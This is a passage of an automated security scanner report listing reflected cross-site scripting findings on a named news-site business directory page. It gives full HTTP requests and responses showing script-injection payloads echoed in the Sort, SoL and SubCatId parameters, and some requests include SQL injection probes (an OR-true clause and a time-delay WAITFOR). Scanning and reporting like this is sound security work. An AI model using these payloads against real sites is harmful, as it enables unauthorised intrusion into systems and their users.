458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=993e6"><script>alert(1)</script>ebf5fb1369cea971&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91596
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADQTTDT=OBNHKJGABMAGILOJIKNEMAPJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="SoL" value="993e6"><script>alert(1)</script>ebf5fb1369cea971">
...[SNIP]...

4.226. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [Sort parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the Sort request parameter is copied into the HTML document as plain text between tags. The payload c3c72<script>alert(1)</script>0f77a1caf09 was submitted in the Sort parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=3&SOrder=A&Sort=Dc3c72<script>alert(1)</script>0f77a1caf09&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:49:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACATSTCS=HOOJLAHACKGAIHHAKLJMBLJO; path=/
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
6155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=3&SOrder=A&Sort=Dc3c72<script>alert(1)</script>0f77a1caf09&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%
...[SNIP]...

4.227. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [Sort parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the Sort request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5028"><script>alert(1)</script>5b02f68d0fe8409cb was submitted in the Sort parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=Da5028"><script>alert(1)</script>5b02f68d0fe8409cb&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91523
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCCSTRAT=LHDDEGAAHBKCPNFMPNLNAJKL; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="Sort" value="Da5028"><script>alert(1)</script>5b02f68d0fe8409cb">
...[SNIP]...

4.228. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [SubCatId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the SubCatId request parameter is copied into the HTML document as plain text between tags. The payload f372a<script>alert(1)</script>263fdaa00f1 was submitted in the SubCatId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3f372a<script>alert(1)</script>263fdaa00f1&UserEmail=netsparker%40example.com&UserPwd=3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3f372a<script>alert(1)</script>263fdaa00f1&UserEmail=netsparker%40example.com&UserPwd=3<h1>
...[SNIP]...

4.229. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [SubCatId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the SubCatId request parameter is copied into the HTML document as plain text between tags. The payload 6b8a7<script>alert(1)</script>020a98bd018 was submitted in the SubCatId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=36b8a7<script>alert(1)</script>020a98bd018 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:29:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 166
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=36b8a7<script>alert(1)</script>020a98bd018

4.230. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [SubCatId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the SubCatId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de4a9"><script>alert(1)</script>688b776b6073a4688 was submitted in the SubCatId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c12